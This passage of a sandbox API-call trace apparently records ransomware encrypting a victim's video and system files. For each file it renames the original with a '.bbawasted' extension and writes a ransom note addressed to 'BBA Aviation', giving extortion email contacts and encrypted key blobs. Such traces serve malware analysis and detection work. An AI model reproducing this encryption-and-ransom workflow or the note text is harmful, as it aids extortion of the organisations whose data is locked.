dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0231.391] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0231.529] SetEndOfFile (hFile=0x28c) returned 1 [0231.531] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0231.531] CloseHandle (hObject=0x28c) returned 1 [0231.531] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae850 | out: hHeap=0x660000) returned 1 [0231.532] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9fc8 | out: hHeap=0x660000) returned 1 [0231.532] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6460) returned 1 [0231.532] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0231.532] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0231.532] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\l_3mVHScz7SGFxF1Y.flv") returned 62 [0231.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x286) returned 0x6c4b88 [0231.533] lstrcpyW (in: lpString1=0x6c4c04, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0231.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0231.533] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6570) returned 1 [0231.533] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0231.534] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0231.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\l_3mVHScz7SGFxF1Y.flv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\l_3mvhscz7sgfxf1y.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0231.534] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0231.535] SetEndOfFile (hFile=0x28c) returned 1 [0231.536] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0231.536] lstrcpyW (in: lpString1=0x6c4c04, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0231.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\l_3mVHScz7SGFxF1Y.flv" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\l_3mvhscz7sgfxf1y.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\l_3mVHScz7SGFxF1Y.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\l_3mvhscz7sgfxf1y.flv.bbawasted")) returned 1 [0231.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\l_3mVHScz7SGFxF1Y.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\l_3mvhscz7sgfxf1y.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0231.537] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0231.537] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x5da2 [0231.537] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5da2) returned 0x5f0000 [0231.537] CloseHandle (hObject=0x294) returned 1 [0231.538] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0231.539] CloseHandle (hObject=0x290) returned 1 [0231.539] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0231.539] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6708) returned 1 [0231.539] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0231.539] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0231.539] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6680) returned 1 [0231.540] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0231.540] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0231.551] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0231.551] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0231.551] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0231.551] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]YrhJ9yjOuVv0DygtKLfHrgl5AvLQWLLJIjRMc42V96lB29M9w0C1v8gi9PD6uyul\r\npmwDafJE42HeWnJh1S6rap/GkHV9sfU/DBG3i2i6z0XJcVSux+eEsug1uEPJmD02\r\nwqeARmLN1T/dwme4TBBSFxUNzK9ty2kIwCqbYDBGXjTGVpG1PN6+CBPkgJeE7C8r\r\nhmTmuNbCamLkT/oyC8TM0tf3a0C0fmQlRlo1JoHbwMmhZopGgGNg+iiIK1xsfsvr\r\nvL6V6hEHl6zROYvz+kh48/8AVRtSmELHMZyT1K6/9xO/6KuPxyVZVKjCr7Aa0abG\r\nprJcW9jL3BBWk0NqifCXM4DF+hudKr177LsxJlNzc7VDIZVCQQQUke0CsLvjknVh\r\n4fd4ZS5vMJ5FeemEqVhzxVyZCPpfCgsdXieCXtBu1qiRiNcSl90ieeYiAqGFLn8b\r\n87mjNQ79CgsR9l17I2JjNGh7l1gy7NOfJknPL8iB88tHcgCFKwX6LGzLggE9OKH4\r\nM+36vqeLwqYVGijVVUPXvZyZIqwEICC8oPzDBGFB9wA2CmQYZaKskL+X+vq/wO4+\r\nrlj63dxhS7qj6KYD20zdd2GiOnC92XnFCWxeScRMXrwuO0vzSHXhyqIcc4wZn5CO\r\n9a3qHrWE4BYTDOLblCDaYMfZ4yfTGJ45RUi2MdEMyQU=[end_key]\r\nKEEP IT\r\n") returned 984 [0231.551] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0231.551] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0231.551] SetEndOfFile (hFile=0x28c) returned 1 [0231.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0231.557] CloseHandle (hObject=0x28c) returned 1 [0231.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0231.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a70a8 | out: hHeap=0x660000) returned 1 [0231.558] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6bd0) returned 1 [0231.558] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0231.558] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0231.558] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\O6vR9Awa9dX.mp4") returned 56 [0231.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0231.559] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0231.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0231.559] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6708) returned 1 [0231.559] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0231.559] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0231.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\O6vR9Awa9dX.mp4.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\o6vr9awa9dx.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0231.683] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0231.685] SetEndOfFile (hFile=0x28c) returned 1 [0231.685] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0231.685] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0231.685] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\O6vR9Awa9dX.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\o6vr9awa9dx.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\O6vR9Awa9dX.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\o6vr9awa9dx.mp4.bbawasted")) returned 1 [0231.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\O6vR9Awa9dX.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\o6vr9awa9dx.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0231.783] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0231.783] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xdc57 [0231.783] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdc57) returned 0x5f0000 [0231.783] CloseHandle (hObject=0x290) returned 1 [0231.785] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0231.786] CloseHandle (hObject=0x294) returned 1 [0231.786] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0231.786] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5f98) returned 1 [0231.787] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0231.787] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0231.787] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6240) returned 1 [0231.788] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0231.788] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0231.850] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0231.850] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0231.850] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0231.850] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]adSlRwRkHkbmmypcZP1PoZddZpxaEEbsYRjW6LFJUv4QTTvhQSKojuLBQHB5KUCM\r\n3yjqhqGXhUA4cO8R2VVLUuQhdtqvcbH4rHMlddZt0OrT3A2LVA3QvXAxPbi4Ch4L\r\naOacfBODmH1UkSq1GjvzeqEFKhB60IWZyBy8oXAtcNl1mUDAoM/Hw0SbArpQ3bSH\r\n09FwfUcgUUvaGV7VXw1BJSh6hiQA68PVR8Ux0H3CzM/QGmasygdEQ6EvNtknqp7r\r\nil/8GFdTG7cpJXk5rk3ZAOlFhk+UJ/cubQEHCQwc7ebwVWbMZvDqwuzdiSbOJLUF\r\nZRU3aTHbOdTvm8DwTxm+f9+8DxNiaPzz9yRjarpOCwG+GZWXpAgX8FtHXuyy3Ax9\r\nsmgzJ/Ybqew9DDyQwycbeCtEFegnEMtVRhTTgKm5cIYZGZEBg4AE9AFMYKWZJYAl\r\nfgHj2e2M2xTFF7Jaq40xAepn0ZVTF8E1wLr8my3hlmlU4ETPlqroekTtcbljs6pw\r\nThtC/P5GDj9Y9+3Q9Txupoeh3kEfI3bsaP4NftSuIRcZa0ukC5NveuZSZO0HTG5+\r\nBLDihvxXnU4wpOsKrgGDheZrxgYCFMQAkzgG9ThiBvT6CybBGl7wNz5Ne2A1AypR\r\nm7ohqVd9eWhJ9wmPbSEWzLz+COxK0U8zzgrjzSJZ2it=[end_key]\r\nKEEP IT\r\n") returned 984 [0231.850] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0231.850] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0231.851] SetEndOfFile (hFile=0x28c) returned 1 [0231.853] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0231.853] CloseHandle (hObject=0x28c) returned 1 [0231.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0231.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa098 | out: hHeap=0x660000) returned 1 [0231.854] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a5f10) returned 1 [0231.901] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0231.901] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0231.902] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\xNJvuBQ1j.mp4") returned 54 [0231.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6c4b88 [0231.903] lstrcpyW (in: lpString1=0x6c4bf4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0231.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0231.903] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6708) returned 1 [0231.904] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0231.904] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0231.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\xNJvuBQ1j.mp4.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\xnjvubq1j.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0231.905] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0231.907] SetEndOfFile (hFile=0x28c) returned 1 [0231.907] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0231.908] lstrcpyW (in: lpString1=0x6c4bf4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0231.908] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\xNJvuBQ1j.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\xnjvubq1j.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\xNJvuBQ1j.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\xnjvubq1j.mp4.bbawasted")) returned 1 [0231.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\UQqqUR44Z9WQh\\xNJvuBQ1j.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\uqqqur44z9wqh\\xnjvubq1j.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0231.910] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0231.910] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x3c1b [0231.910] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3c1b) returned 0x5f0000 [0231.911] CloseHandle (hObject=0x294) returned 1 [0231.912] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0231.913] CloseHandle (hObject=0x290) returned 1 [0231.913] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0231.913] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6c58) returned 1 [0231.914] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0231.914] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0231.914] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a60a8) returned 1 [0231.915] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0231.915] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0232.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0232.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0232.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0232.198] _snwprintf (in: _Dest=0x6ae598, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]l5LHu4HY/L/heZc0mxbtcV5TMnpus6tpej7jE5NMEtQm67EipeAoxD+9lt33Eshf\r\n1c77m1N8dlvum6h4q6jfBghSLjGeIuG9cu0HncQhWyCDy1dgWCMymu/Z/tn2gDFv\r\n9yq+EDa/nWkZpwXQGtVns8lu83Lz63hKy2KCYPJ1fc5s2aRaLop8FSShpXi27zRh\r\nCg8frMvr2dyDfceV1enfkU+rRx+/TIL07selgqyaomEDmyKRP3iZO75z/ISU/aU3\r\nYzb25M3Mbf+pE7ht8H1l5u0IqK9JXjVXbLsUamo/SzG7agQnXmK4oXg68kb0q0oI\r\niUZYrrjMmnEvFlD/Ey1SPg2uUOeVt039+PBc+Eg2zI3MagiA7KwA72HjNuIwToaI\r\nTfHLA9/wAZ7m2ohKwtDxnNDu1S7K7fOgc0sWFpqaSvpcDrfaF+RE3JnpXK6V5AeG\r\n3vueyfczOt08PzhI6DwwICfVUodWsaFqBWAG7rS9vl2rGP4gmTDtczgCQOvq/52v\r\nXoat9rp4MCI/FIZm/HeUOG2/Wl64FC9rQgllPdjhfbpp//XSUXLJSsiCXzquXVC8\r\nxwCW1pLcxq7sjaP3o6stKRFUu0zz9I0wSDjRFX1VgNJPe1fyI60zwa8TWyQpEuQ7\r\n0Ryc7plESHIUGWmB58vMQ9vRIBZgVpSuw3ja/j1cnlV=[end_key]\r\nKEEP IT\r\n") returned 984 [0232.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0232.198] WriteFile (in: hFile=0x28c, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0232.199] SetEndOfFile (hFile=0x28c) returned 1 [0232.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0232.202] CloseHandle (hObject=0x28c) returned 1 [0232.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0232.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7c48 | out: hHeap=0x660000) returned 1 [0232.203] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6928) returned 1 [0232.203] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0232.203] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0232.203] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt") returned 52 [0232.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6c4b88 [0232.204] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0232.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0232.204] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f98) returned 1 [0232.205] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6ae598 | out: pbBuffer=0x6ae598) returned 1 [0232.205] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0232.205] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt.bbawasted_info" (normalized: 